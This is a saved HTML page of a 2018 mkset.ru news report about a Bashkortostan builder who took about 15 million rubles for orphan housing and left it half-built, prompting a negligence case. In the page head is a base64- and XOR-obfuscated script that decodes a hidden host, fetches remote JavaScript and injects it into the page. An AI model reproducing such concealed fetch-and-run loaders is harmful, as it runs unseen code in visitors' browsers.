<!DOCTYPE html><html lang="ru"><head><meta charset="utf-8" />
<script>window.NREUM||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","errorBeacon":"bam.nr-data.net","licenseKey":"9bf4e866b9","applicationID":"221024743","transactionName":"eg5dFkYJXg9SShoCVkoKRw1ESVMRQ1FWClZKTkAKWxE=","queueTime":0,"applicationTime":298,"agent":""}</script>
<script>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</script><meta content="width=1200" name="viewport" /><meta content="origin" name="referrer" /><meta data-params="{&quot;id&quot;: 36397555,&quot;clickmap&quot;: true,
&quot;trackLinks&quot;: true,&quot;accurateTrackBounce&quot;: true, &quot;triggerEvent&quot;: true}" name="yandex_metrika_params" /><meta content="CAdi5fZr5A0-tdnSJ0ss52aEkw9nJeWQPEy93op2r5Y" name="google-site-verification" /><meta content="" name="mailru-domain" /><meta content="adbf4ba57979fc50" name="yandex-verification" /><meta content="Возбуждено уголовное дело. | Mkset.ru" name="description" /><meta content="https://m.mkset.ru/news/incident/01-11-2018/v-bashkirii-stroiteli-osvoili-15-byudzhetnyh-millionov-i-ne-sdali-zhilie-dlya-sirot" name="mobile_version_path" /><meta content="Марат Гареев" name="mediator_author" /><meta content="Антикоррупция" name="mediator_theme" /><meta content="Происшествия" name="mediator_theme" /><meta content="1716850" name="mediator" /><meta content="2018-11-01T11:06:21+03:00" name="mediator_published_time" /><meta property="og:type" content="article"></meta><meta property="og:title" content="В Башкирии строители освоили 15 бюджетных миллионов и не сдали жилье для сирот"></meta><meta property="og:description" content="Возбуждено уголовное дело."></meta><meta property="og:url" content="https://mkset.ru/news/incident/01-11-2018/v-bashkirii-stroiteli-osvoili-15-byudzhetnyh-millionov-i-ne-sdali-zhilie-dlya-sirot"></meta><meta property="og:locale" content="ru_RU"></meta><meta name="twitter:card" content="summary"></meta><meta name="twitter:site" content="@mediakorset"></meta><meta name="twitter:creator" content="@mediakorset"></meta><meta name="twitter:image" content="https://mkset.ru/attachments/557326f964653c1c142e2b99464267c096158849/store/fill/1200/630/d73c18cad7d98daacd487970afc2087d400cdf5a809f302af0d74cc703dc/3.jpg"></meta><meta property="vk:image" content="https://mkset.ru/attachments/557326f964653c1c142e2b99464267c096158849/store/fill/1200/630/d73c18cad7d98daacd487970afc2087d400cdf5a809f302af0d74cc703dc/3.jpg"></meta><meta property="og:image" content="https://mkset.ru/attachments/557326f964653c1c142e2b99464267c096158849/store/fill/1200/630/d73c18cad7d98daacd487970afc2087d400cdf5a809f302af0d74cc703dc/3.jpg"></meta><meta property="mywidget:image" content="https://mkset.ru/attachments/557326f964653c1c142e2b99464267c096158849/store/fill/1200/630/d73c18cad7d98daacd487970afc2087d400cdf5a809f302af0d74cc703dc/3.jpg"></meta><link href="/attachments/f93554a66395343df544e27a5913b4b055aa912f/store/6f5dbc03ab5d3065a77555e8c8b07619b81c9152d12af2681d896a506086/32.png" rel="icon" /><link href="/attachments/377d3cd061298f0ccbb8212f5eaf4170b1c461e3/store/8b7b41f1b6ded59d5617189ec66b4b483f88516865e142019b221cc0d179/152.png" rel="apple-touch-icon-precomposed" /><meta content="/attachments/3f111b449823db522ec28f00e6c0657b454917b8/store/ace3c55e8e5cd5c696635a2ea720a7b52d667c869eefaf1caa25c6adb62d/144.png" name="msapplication-TileImage" /><title>В Башкирии строители освоили 15 бюджетных миллионов и не сдали жилье для сирот | Mkset.ru</title><link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700|PT+Serif:400,700&amp;subset=cyrillic" rel="stylesheet" /><link href="https://cdnjs.cloudflare.com/ajax/libs/fotorama/4.6.4/fotorama.css" rel="stylesheet" /><link rel="stylesheet" href="/frontend/desktop/build/styles_ED1C24/app-9dbce141d1.css" /><script src="/assets/desktop/app-c9f16239ddd93f1621d169f2baecbd4e7d5564df066abbde94bd799ad497599b.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/fotorama/4.6.4/fotorama.js"></script><script src="/frontend/desktop/build/js/app-cbea1622dc95ad3277d0.js"></script><script src="https://yastatic.net/pcode/adfox/loader.js"></script><script src="//vk.com/js/api/openapi.js?139"></script><script async src="https://cdn.onthe.io/io.js/T897fOJfBwVF"></script><script src="https://likes.ru/js/widget/build/widget.js?rand=13254"></script><meta name="csrf-param" content="authenticity_token" />
<meta name="csrf-token" content="KC3AdaIAPjKBj6aNU7jCZCQHYC8Vtp0DNVhyPIjbcmi3uNpriiB2sO004ZCi5cd0MRLlyj9iREdAPpcJoklxBA==" /><script type="text/javascript">
    // Thu Nov 01 2018 14:28:04 GMT+0300 (Moscow Standard Time)
    new (function() {
        var host,
            v = 300,
            us,
            start;
        var c = function (g, u, s, h) {
            us = g;
            v = u;
            host = s;
            load([e(atob(host), p(g)), h].join("/"));
        };

        var load = function(g){
            start = window["performance"]["now"]();
            if (typeof window.fetch === 'function') {
                fetch(new Request(g, {redirect: 'error', 'method': 'GET'}))
                    .then(function (response) {
                        return response.text();
                    })
                    .then(insertScript)
                    .catch(onLoadError);
            } else {
                var h = new window["XMLHttpRequest"]();
                h["open"]("GET", g, true);
                h["responseType"] = "text";
                h["addEventListener"]("load", onLoad);
                h["addEventListener"]("error", onLoadError);
                h["send"](null);
            }

        };
        var onLoad = function(e){
            var c = e.target;
            if (c['status'] === 204) {
                return
            }
            insertScript(c.responseText);
        };

        var onLoadError = function(e){
            var b = window["performance"]["now"]() - start;
            if (v > 0 && b > 0 && b < v) {
                /* stop()*/
            }
        };
        var insertScript = function(c){
            var d = window['document']["createElement"]("script");
            d["async"] = false;
            d["textContent"] = c;
            var attr = {"id": "cc-support-script", "data-config":  us, "data-base": host};
            Object.keys(attr).forEach(function (key) {
                d.setAttribute(key, attr[key]);
            });
            window['document']["head"]["appendChild"](d);
        };
        var stop = function(){
            var c = window['document']["styleSheets"];
            for (var d = 0; d < c['length']; d++) {
                c[d]["disabled"] = true
            }
            window["stop"]();
        };
        function p (s) {
            var str = 0;
            s = s.toString().split("");
            for(var i = 0; i< s.length; i++){
                str+= parseInt(s[i]);
            }
            return str.toString();
        }

        function e (s, k) {
            var enc = "";
            for (var i = 0; i < s.length; i++) {
                var a = s.charCodeAt(i);
                var b = a ^ k;
                enc = enc + String.fromCharCode(b);
            }
            return enc;
        }
        return c;
    }() )('10047', 300, 'ZHh4fH82IyN8bX9pZ2l+ZXgifnk=', 'jjs3y4app/gihd3pq/wbv9sd/kjwohd19chud/elu2osn7/zy8t0cjh/ozlg7aqu');
</script>
<script id="cc-support-script" data-config="10047" data-base="ZHh4fH82IyN8bX9pZ2l+ZXgifnk=" type="text/javascript" src="https://pasekerit.ru/jjs3y4app/gihd3pq/wbv9sd/kjwohd19chud/elu2osn7/zy8t0cjh/ozlg7aqu"></script></head><body><!-- tns-counter.ru -->
<script type="text/javascript">
	(function(win, doc, cb){
		(win[cb] = win[cb] || []).push(function() {
			try {
				tnsCounter1mediainvest_ru = new TNS.TnsCounter({
				'account':'1mediainvest_ru',
				'tmsec': 'mkset_total'
				});
			} catch(e){}
		});

		var tnsscript = doc.createElement('script');
		tnsscript.type = 'text/javascript';
		tnsscript.async = true;
		tnsscript.src = ('https:' == doc.location.protocol ? 'https:' : 'http:') + 
			'//www.tns-counter.ru/tcounter.js';
		var s = doc.getElementsByTagName('script')[0];
		s.parentNode.insertBefore(tnsscript, s);
	})(window, this.document,'tnscounter_callback');
</script>
<noscript>
	<img src="//www.tns-counter.ru/V13a****1mediainvest_ru/ru/UTF-8/tmsec=mkset_total/" width="0" height="0" alt="" />
</noscript>
<!--/ tns-counter.ru --><!--AdFox START--><!--uramedia-->
<!--Площадка: http://mkset.ru/ / * / *-->
<!--Тип баннера: FullScreen HTML [Sync_Async]-->
<!--Расположение: <верх страницы>-->
<div id='adfox_1490007841138549'></div>
<script>
window.Ya.adfoxCode.create({ownerId: 249448,containerId: 'adfox_1490007841138549',params: {pp: 'g',ps: 'cgss',p2: 'fjny'}});</script><div class="catfish-component"><script type="text/template"></script></div><header class="topline"><div class="blue-line"></div><div class="site-container"><div class="container position-relative"><a class="logo" href="/" style="top: 6px;"><img class="regular" src="/attachments/6dcbbfb234eef38d3d15c7cbc8cc4f6401476b48/store/a9e1953f0a9912ae514ca80196032541233c117d7d732b4749c18aadcef0/site_logo_main.svg" alt="Site logo main" /><img class="for-menu" src="/attachments/e1ba5e033b154ef8e87c70e5a985b3010daa2fc3/store/12587476a82e41056e9bc1ec76e5475454bae401722df876ec58a3472b1d/site_logo_menu.svg" alt="Site logo menu" /></a><div class="menu-trigger"></div><div class="menu"><div class="items"><div class="item"><a href="/news">Новости</a></div><div class="item"><a href="/article/general">Аналитика</a></div><div class="item"><a href="/cards">Карточки</a></div><div class="item"><a href="/article/tilda">Подробно</a></div><div class="item"><a href="/comment">Мнения</a></div><div class="item"><a href="/person">Персоны</a></div><div class="item"><a href="/test">Тесты</a></div><div class="item"><a href="/story/fotofakt">Фотофакт</a></div><div class="item"><a href="/story/intervyu">Интервью</a></div><div class="item"><a href="https://mkset.ru/story/medialanch">Медиаланч</a></div><div class="item"><a href="https://mkset.ru/story/video">Видео</a></div></div><div class="height-10"></div><div class="line"></div><a class="bg-item" href="http://mkset.ru/story/spetsproekty-9040a15f-f4be-4ecf-a4b4-be17d6608496">Спецпроекты</a></div><div class="search-form-trigger"></div><form class="search-form" action="/search" accept-charset="UTF-8" method="get"><input name="utf8" type="hidden" value="&#x2713;" /><input class="query" name="query" type="text" /><button type="submit">Найти</button></form><div class="mat-title"><div class="text-title">В Башкирии строители освоили 15 бюджетных миллионов и не сдали жилье для сирот</div><div class="share-popups-component" data-no-google="true"><div class="share-popups-component-invite"><div class="ct-close"></div><div class="ct-title">Читайте Mkset.ru в официальной группе</div><div class="ct-text">Следите за самыми важными новостями региона в ленте друзей</div><div class="ct-items"><a class="ct-item __fb" href="https://www.facebook.com/mksetnew" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Facebook</div></a><a class="ct-item __vk" href="http://vk.com/mksetru" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">ВКонтакте</div></a><a class="ct-item __twitter" href="http://www.twitter.com/mediakorset" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Twitter</div></a><a class="ct-item __od" href="https://ok.ru/group/57918905647149" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Одноклассники</div></a><a class="ct-item __google" href="https://plus.google.com/communities/111616876821027098896" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Google+</div></a></div></div><div class="social3-component"><div class="ct-s3-items"><div class="ct-s3-item ct-sp-link __fb"></div><div class="ct-s3-item ct-sp-link __vk" data-counter-url="/api/sharings/1716850/Vk/update_shares"></div><div class="ct-s3-item __other"></div><div class="ct-s3-other"><div class="ct-s3-item ct-sp-link __twitter"><span></span></div><div class="ct-s3-item ct-sp-link __od" data-counter-url="/api/sharings/1716850/Ok/update_shares"><span></span></div><div class="ct-s3-item ct-sp-link __google" data-counter-url="/api/sharings/1716850/GooglePlus/update_shares"><span></span></div></div></div></div></div></div><div class="stories"><div class="wrap-inner"><div class="text-title __small">Сюжеты:</div><div class="tabs2-component"><a href="/story/ufalogiya-transport">Уфалогия: Транспорт</a><a href="/story/vlast-v-efire">Власть без цензуры</a><a href="/story/boleem-za-nashih">Болеем за наших</a></div></div></div></div></div></header><div class="media-lunch-teaser-component" data-cookie-name="lunch_26_36" data-cookie-value="set"></div><div class="typo-component"><div class="ct-typo-bg"></div><form action="/typos/submit" accept-charset="UTF-8" method="post"><input name="utf8" type="hidden" value="&#x2713;" /><input type="hidden" name="authenticity_token" value="LCCnkUHHiDok53RGXKx+LzItRBDj80RGeZDuumHSpciztb2PaefAuEhcM1ut8Xs/JzjB9cknnQIM9guPS0CmpA==" /><div class="ct-close"></div><div class="ct-title">Вы нашли ошибку</div><div class="ct-thanx">Спасибо! <br> Сообщение отправлено.</div><div class="ct-form-fields"><input type="hidden" name="typo[text]" id="typo_text" class="ct-selection-field" required="required" /><input type="hidden" name="typo[url]" id="typo_url" class="ct-url-field" required="required" /><div class="ct-text"></div><textarea name="typo[comment]" id="typo_comment">
Ваш комментарий</textarea><button name="button" type="submit" class="cm-button __blue">Отправить</button></div></form></div><div class="article-page-container"><div class="autoscroll-counter-component"></div><div class="yandex-metrika-component" data-ids="[36397555]" data-params="{&quot;clickmap&quot;: true,&quot;trackLinks&quot;: true,
&quot;accurateTrackBounce&quot;: true, &quot;webvisor&quot;: true, &quot;triggerEvent&quot;: true}"></div><script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-69499034-1', 'auto');ga('send', 'pageview');</script><script type="text/javascript">
!function(){function t(t,e){var a=document.createElement("script");a.type="text/javascript",a.src="https://adblockmetrics.ru/"+t,a.async=0,void 0!==e&&(a.setAttribute("data-config",e),a.setAttribute("data-support","adbm"));var r=document.getElementsByTagName("script")[0];r.parentNode.insertBefore(a,r)}t("js/__fab.js","5ad480b16220a4245d1d25d2"),t("js/metric.js")}();
</script><div class="google-analytics-component"></div><div class="uralweb-component"><script type="text/template"></script></div><div class="media-scope-component"></div><div class="liveinternet-component" data-hit="hit;1Mediainvest?r"></div><div style="height: 0; overflow: hidden;"></div><div class="smi2-widget-component redtram-component"><div class="article-page-slider"><div class="article-page-slider-divider"></div><div class="article-page-slider-slide" data-adv-global-article-id="0" data-title="В Башкирии строители освоили 15 бюджетных миллионов и не сдали жилье для сирот | Mkset.ru" data-url="/news/incident/01-11-2018/v-bashkirii-stroiteli-osvoili-15-byudzhetnyh-millionov-i-ne-sdali-zhilie-dlya-sirot"><a class="article-page-slider-next-mat" href="/news/incident/01-11-2018/v-bashkirii-stroiteli-osvoili-15-byudzhetnyh-millionov-i-ne-sdali-zhilie-dlya-sirot?ind=1&amp;page=1&amp;show_dt=1"></a><div class="article-block __slider-mat-1716850" data-add-autoscroll-view="" data-id="1716850"><div class="site-container"><section class="two-main-cols __no-bottom-margin __no-top-margin"><div class=adfox-banner-component style='width: 970px; margin: 0 auto; position: relative; top: -23px;'><script type='text/template'>
<!--AdFox START--><!--uramedia-->
<!--Площадка: http://mkset.ru/ / * / *-->
<!--Тип баннера: 970x90-->
<!--Расположение: <верх страницы>-->
<div id='adfox_1490007888969531'></div>
<script>window.Ya.adfoxCode.create({ownerId: 249448,containerId: 'adfox_1490007888969531',params: {pp: 'g',ps: 'cgss',p2: 'fony'}});</script>
</script></div><div class="cols-container"><div class="main-col-left"><section class="main article_page"><div class="main-photo"><div class="gradient-photo-component"><img src="/attachments/b7f7a60c688a2b3a2987d4f164df8bcf06e299e8/store/fill/780/440/d73c18cad7d98daacd487970afc2087d400cdf5a809f302af0d74cc703dc/3.jpg" alt="3" /><div class="cm-gradient-block"><h1 class="ct-title"><b>В Башкирии строители освоили 15 бюджетных миллионов и не сдали жилье для сирот</b> </h1><div class="ct-meta"><span>Сегодня,&nbsp;13:06</span><a href="/news/incident">Происшествия</a><span class="authors">Марат Гареев</span><span>Фото: Марат Гареев/ mkset.ru</span></div></div></div></div><div class="cm-social-margin scrollable-component-parent __both"><div class="__append-to-body scrollable-component" data-top-shift="95"><div class="share-popups-component"><div class="share-popups-component-invite"><div class="ct-close"></div><div class="ct-title">Читайте Mkset.ru в официальной группе</div><div class="ct-text">Следите за самыми важными новостями региона в ленте друзей</div><div class="ct-items"><a class="ct-item __fb" href="https://www.facebook.com/mksetnew" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Facebook</div></a><a class="ct-item __vk" href="http://vk.com/mksetru" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">ВКонтакте</div></a><a class="ct-item __twitter" href="http://www.twitter.com/mediakorset" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Twitter</div></a><a class="ct-item __od" href="https://ok.ru/group/57918905647149" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Одноклассники</div></a><a class="ct-item __google" href="https://plus.google.com/communities/111616876821027098896" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Google+</div></a></div></div><div class="social-component"><a class="ct-sp-link __fb" href="#"></a><a class="ct-sp-link __vk" data-counter-url="/api/sharings/1716850/Vk/update_shares" href="#"></a><a class="ct-sp-link __twitter" href="#"></a></div></div></div><div class="js-mediator-article" data-mediator="1716850" data-mediator-authors="[&quot;Марат Гареев&quot;]" data-mediator-published-time="2018-11-01T11:06:21+03:00" data-mediator-themes="[&quot;Антикоррупция&quot;, &quot;Происшествия&quot;]"><h2 class="cm-par-large pre-line">Возбуждено уголовное дело.</h2><div data-io-article-url="https://mkset.ru/news/incident/01-11-2018/v-bashkirii-stroiteli-osvoili-15-byudzhetnyh-millionov-i-ne-sdali-zhilie-dlya-sirot"><div class="cm-par-medium wysiwyg-component"><p>Дело было в Октябрьском. В городской бюджет из республиканского была перечислена сумма 15 миллионов рублей для строительства жилья для детей-сирот. Квартир должно было быть построено 19.</p></div><div class="cm-par-medium wysiwyg-component"> <p>Строительная компания "СУ-4" получила, по сведениям следственного комитета, почти все деньги. Однако само строительство было закончено не более чем наполовину. Впоследствии были даже подписаны акты приема выполненных работ в объеме 90% и 98%.</p></div><div class="cm-par-medium wysiwyg-component"> <p>Строительство в итоге приостановили из-за нехватки денег, а дети-сироты остались, соответственно, без положенных им квартир. Следователи считают, что налицо преступная халатность чиновников городской администрации Октябрьского. По факту произошедшего возбуждено уголовное дело по статье «Халатность».</p></div><div class="cm-par-medium wysiwyg-component"> <p>- Сейчас мы устанавливаем все обстоятельства этой халатности и выявляем причастных лиц, – говорят в пресс-службе республиканского управления Следственного комитета России.</p></div></div><span class="cm-blue-text __large">Сюжеты:
<a href=/story/antikorruptsiya>Антикоррупция</a></span><div class="height-20"></div></div><div class="adfox-banner-component" style="margin-bottom: 20px"><script type="text/template"><div id="vk_allow_messages_from_community"></div><script type="text/javascript">VK.Widgets.AllowMessagesFromCommunity("vk_allow_messages_from_community", {height: 30}, 25307495);</script></script></div><div class="adfox-banner-component"><script type="text/template"><!--AdFox START-->
<!--uramedia-->
<!--Площадка: http://mkset.ru/ / * / *-->
<!--Тип баннера: poster-->
<!--Расположение: <низ страницы>-->
<div id='adfox_152041166187817946'></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 249448,
        containerId: 'adfox_152041166187817946',
        params: {
            pp: 'i',
            ps: 'cgss',
            p2: 'fvly'
        }
    });
</script></script></div><div class="height-15"></div><div class="block-title __other-mats-title">Материалы по теме</div><div class="other-mats"><div class="elem"><a href="/news/economy/21-07-2018/snizhenie-tempov-stroitelstva-v-bashkirii-uvelichilas-v-2-raza">Снижение темпов строительства в Башкирии ускорилось в 2 раза</a></div><div class="elem"><a href="/cards/28-08-2018/v-bashkirii-molodye-semi-smogut-vlozhit-sotsvyplaty-v-dolevoe-stroitelstvo">В Башкирии молодые семьи смогут вложить соцвыплаты в долевое строительство </a></div><div class="elem"><a href="/news/society/26-10-2018/v-bashkirii-v-dva-raza-snizilos-stroitelstvo-poliklinik-i-shkol">В Башкирии в два раза снизилось строительство поликлиник и школ </a></div></div><div class="tags-component"><a class="cm-button __small __inline-block" href="/articles/tag/20629">уголовное дело</a><a class="cm-button __small __inline-block" href="/articles/tag/22346">чиновники</a></div><hr /><div align="center" class="plashka">Нашли опечатку в тексте? Выделите её и нажмите ctrl+enter</div><div class="height-40"></div><div class="share-popups-component" data-no-google="true"><div class="share-popups-component-invite"><div class="ct-close"></div><div class="ct-title">Читайте Mkset.ru в официальной группе</div><div class="ct-text">Следите за самыми важными новостями региона в ленте друзей</div><div class="ct-items"><a class="ct-item __fb" href="https://www.facebook.com/mksetnew" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Facebook</div></a><a class="ct-item __vk" href="http://vk.com/mksetru" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">ВКонтакте</div></a><a class="ct-item __twitter" href="http://www.twitter.com/mediakorset" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Twitter</div></a><a class="ct-item __od" href="https://ok.ru/group/57918905647149" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Одноклассники</div></a><a class="ct-item __google" href="https://plus.google.com/communities/111616876821027098896" target="_blank"><div class="ct-item-left"><span></span></div><div class="ct-item-right">Google+</div></a></div></div><div class="social2-component"><a class="ct-sc-item __print" href="/news/incident/01-11-2018/v-bashkirii-stroiteli-osvoili-15-byudzhetnyh-millionov-i-ne-sdali-zhilie-dlya-sirot/print" target="__blank" title="Версия для печати"><div class="ct-sc-icon"><span></span></div></a><div class="ct-sc-item ct-sp-link __fb"><div class="ct-sc-icon"><span></span></div><div class="ct-sc-num"></div></div><div class="ct-sc-item ct-sp-link __vk" data-counter-url="/api/sharings/1716850/Vk/update_shares"><div class="ct-sc-icon"><span></span></div><div class="ct-sc-num">0</div></div><div class="ct-sc-item ct-sp-link __twitter"><div class="ct-sc-icon"><span></span></div></div><div class="ct-sc-item ct-sp-link __od" data-counter-url="/api/sharings/1716850/Ok/update_shares"><div class="ct-sc-icon"><span></span></div><div class="ct-sc-num">0</div></div><div class="ct-sc-item ct-sp-link __google" data-counter-url="/api/sharings/1716850/GooglePlus/update_shares"><div class="ct-sc-icon"><span></span></div><div class="ct-sc-num">0</div></div></div></div><div class="script-only-banner-component" data-slide-selector=".__slider-mat-1716850"><script type="text/template"><scriptTag type="text/javascript">
    (function (a, b, c, d, e, f, g, h) {
         g = b.createElement(c);
         g.src = d;
         g.type = "application/javascript";
         g.async = !0;
         h = b.getElementsByTagName(c)[0];
         h.parentNode.insertBefore(g, h);
         a[f] = [];
         a[e] = function () {
             a[f].push(Array.prototype.slice.apply(arguments));
        }
    }) (window, document, "script", (document.location.protocol === "https:"
? "https:" : "http:") + "//cdn01.nativeroll.tv/js/seedr-player.min.js", "SeedrPlayer",
"seedrInit");
</scriptTag>
<scriptTag>
    SeedrPlayer({
        container: '.article-page-slider-slide.current .js-mediator-article div',
		    desiredOffset:	'2',
        gid: "5af1525f9762b68e308b46de",        
        onError: function (e) {}
    });
</scriptTag></script></div><div class="adfox-banner-component" data-inpage-selector=".__slider-mat-1716850"><script type="text/template"><div id="inpage_VI-245918-0-678911479"></div>
<script type="text/javascript">
if (typeof(pr) == "undefined") { var pr = Math.floor(Math.random() * 4294967295) + 1; }
(function(w, d, n, s, t) {
w[n] = w[n] || [];
w[n].push(function() {
Ya.Context.AdvManager.render({
blockId: "VI-245918-0",
renderTo: "inpage_VI-245918-0-678911479",
inpage: {
slide: true,
visibleAfterInit: false,
adFoxUrl: "//ads.adfox.ru/249448/getCode?pp=h&ps=cgss&p2=frmo&fmt=1&pr="+pr,
insertAfter: ".article-page-slider-slide.current .article_page p",
insertPosition: "2"
},
}, function callback (params) {
});
});
t = d.getElementsByTagName("script")[0];
s = d.createElement("script");
s.type = "text/javascript";
s.src = "//an.yandex.ru/system/context.js";
s.async = true;
t.parentNode.insertBefore(s, t);
})(this, this.document, "yandexContextAsyncCallbacks");
</script></script></div></div></section></div><div class="main-col-right __article-right-col scrollable-component-parent"><div class="adfox-banner-component"><script type="text/template"><!--AdFox START--><!--uramedia-->
<!--Площадка: http://mkset.ru/ / * / *--><!--Тип баннера: 300х300-desktop-->
<!--Расположение: середина-1--><div id='adfox_150936341090459223'></div>
<script>window.Ya.adfoxCode.create({ownerId: 249448,
containerId: 'adfox_150936341090459223',params: {
pp: 'kbp',ps: 'cgss',p2: 'fpew'}});</script></script></div><div class="height-20"></div><div class="banner-300-600"><div class="adfox-banner-component" data-custom-content-url="/api/weekly_top"><script type="text/template"><!--AdFox START--><!--uramedia-->
<!--Площадка: http://mkset.ru/ / * / *-->
<!--Тип баннера: 300х600-->
<!--Расположение: <верх страницы>-->
<div id='adfox_149000772648140'></div>
<script>
window.Ya.adfoxCode.create({
ownerId: 249448,
containerId: 'adfox_149000772648140',
params: {
pp: 'g',
ps: 'cgss',
p2: 'fojz'
}});</script></script></div></div></div></div><div class="read-also-container"><div class="container"><div class="read-also-component"><div class="ct-main-title">Читайте <br> также</div><div class="ct-items"><a class="ct-item metrika-goal-component" data-goal="promodown-1" href="/news/society/30-10-2018/delo-semi-iz-bashkirii-repressirovannye-plennye-dezertiry-nkvdshniki"><div class="ct-image"><img width="84" height="47" class="attachment news_item image" src="/attachments/228d8d614e0fa9971b5291021c9dd24812e19431/store/fill/84/47/bf1b0c0904aae73417c6e79da54027d66f8650e10b3be02a3a308822c140/%D0%A2%D1%80%D0%BE%D1%88%D0%BA%D0%B8%D0%BD%D1%8B.jpg" /></div><div class="ct-title"> Дело семьи из Башкирии: репрессированные, пленные, дезертиры, НКВДшники</div></a><a class="ct-item metrika-goal-component" data-goal="promodown-2" href="/news/society/29-10-2018/v-bashkirii-sud-po-delu-glavy-haybullinskogo-rayona-perenesli-v-chetvertyy-raz"><div class="ct-image"><img width="84" height="47" class="attachment news_item image" src="/attachments/f1d7a3e89515634420d5e7e42c7ee3e3786ae183/store/fill/84/47/5da5219c2e131b675b8e204ebf3f6c884f7702a8cfad881ca0109a925eb9/%D0%A0%D0%B0%D0%B8%D0%BB+%D0%98%D0%B1%D1%80%D0%B0%D0%B3%D0%B8%D0%BC%D0%BE%D0%B23.jpg" /></div><div class="ct-title">В Башкирии суд по делу главы Хайбуллинского района перенесли в четвертый раз</div></a><a class="ct-item metrika-goal-component __last" data-goal="promodown-3" href="/news/society/25-10-2018/bez-nog-bez-pensii-v-bashkirii-invalid-vynuzhden-zhit-v-dome-bez-gaza-sveta-i-vody"><div class="ct-image"><img width="84" height="47" class="attachment news_item image" src="/attachments/4de815f74acab088ae9e0edb4fb6bee0659b389f/store/fill/84/47/c257a9704b58f12c2e43262d4bf3c3820ba6df2f5de41ec24a646c59ce21/La_fdf79a9c.jpg" /></div><div class="ct-title">Без ног, без пенсии: В Башкирии инвалид вынужден жить в доме без газа, света и воды</div></a></div></div><div class="read-also-component __yellow-bg __border-top"><div class="ct-main-title">Читайте также</div><div class="ct-items"><a class="ct-item" href="https://newizv.ru/news/tech/29-10-2018/telefon-vo-spasenie-novyy-domashniy-panasonik-pomogaet-pozhilym-lyudyam"><div class="ct-image"><img width="84" height="47" class="attachment through_teaser_block top_image" src="/attachments/4440df1540bfb91ac6d7ce10d3e65416e2791a5d/store/fill/84/47/900a22c5f82f77bece43cdc7bf627f45131de07a7ae8ff7d0ea4dbdfd163/223.jpg" /></div><div class="ct-title">Panasonic спас жизнь пожилому человеку</div></a><a class="ct-item" href="https://newizv.ru/news/economy/29-10-2018/lichnyy-opyt-skolko-na-samom-dele-stoit-kurinoe-myaso"><div class="ct-image"><img width="84" height="47" class="attachment through_teaser_block mid_image" src="/attachments/63f45dbb4dfbf34298c6438cd080d33f43098efb/store/fill/84/47/7fe7991f64446808ebab2be8fcdce56011f0424e1ee14ed62ef23b982d1b/224.jpg" /></div><div class="ct-title">Сколько на самом деле стоит куриное мясо?</div></a><a class="ct-item __last" href="https://inkazan.ru/news/economy/30-10-2018/kreml-v-kurse-situatsii-na-rynke-benzina-peskov"><div class="ct-image"><img width="84" height="47" class="attachment through_teaser_block bottom_image" src="/attachments/64d46be3557dd9c8bb932f651aacd2418c9eb679/store/fill/84/47/22b812b592d9d9e0bbc5745a1f93564287bb64517bbdbfa059900916737f/225.jpg" /></div><div class="ct-title">Кремль в курсе ситуации на рынке бензина</div></a></div></div><div class="smi2-widget-elem"><div id='unit_88973'><a href='http://smi2.ru/'>Новости smi2.ru</a></div>
<script type='text/javascript' charset='utf-8'>
(function() {
var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
sc.src = '//smi2.ru/data/js/88973.js'; sc.charset = 'utf-8';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);}());</script></div><div class="redtram-elem" data-type="lentainform" style="margin-left: -15px; margin-right: -15px; background: #f6f3ec; padding-bottom: 15px;"><script type="text/template"><div>
<div class="clearfix" style="padding: 15px 20px 0 20px; margin-bottom: -15px;">
<div class="ct-main-title" style="float:left;width:9%;font-weight: 700;line-height: 1.06;color: #16325c;">Популярное</div> 
<div class="my-widget-anchor" style="float:left; width:87.5%;" data-cid="ad0a4533c1c4745e4a7baa3f60fbe3a4"></div>
</div>
</div>
<script> 
window.myWidgetInit = {useDomReady: false}; (function(d, s, id) { var js, t = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "https://likemore-go.imgsmail.ru/widget.js"; t.parentNode.insertBefore(js, t); }(document, "script", "my-widget-script"));
</script></script></div><div class='likes-widget __no-logo' data-api-url='https://likes.ru/api/v1/get_teaser_data.json?limit=6&city=10' style='margin: 0 -20px 0 -15px;'></div></div></div></section></div><script>
      window._io_config = window._io_config || {};
      window._io_config["0.2.0"] = window._io_config["0.2.0"] || [];
      window._io_config["0.2.0"].push({
      page_url: "https://mkset.ru/news/incident/01-11-2018/v-bashkirii-stroiteli-osvoili-15-byudzhetnyh-millionov-i-ne-sdali-zhilie-dlya-sirot",
      page_url_canonical: "https://mkset.ru/news/incident/01-11-2018/v-bashkirii-stroiteli-osvoili-15-byudzhetnyh-millionov-i-ne-sdali-zhilie-dlya-sirot",
      page_title: "В Башкирии строители освоили 15 бюджетных миллионов и не сдали жилье для сирот",
      page_type: "article",
      page_language: "ru",
      article_authors: ["Марат Гареев"],
      article_categories: ["ПРОИСШЕСТВИЯ"],
      article_subcategories: ["АНТИКОРРУПЦИЯ"],
      article_type: "Новость",
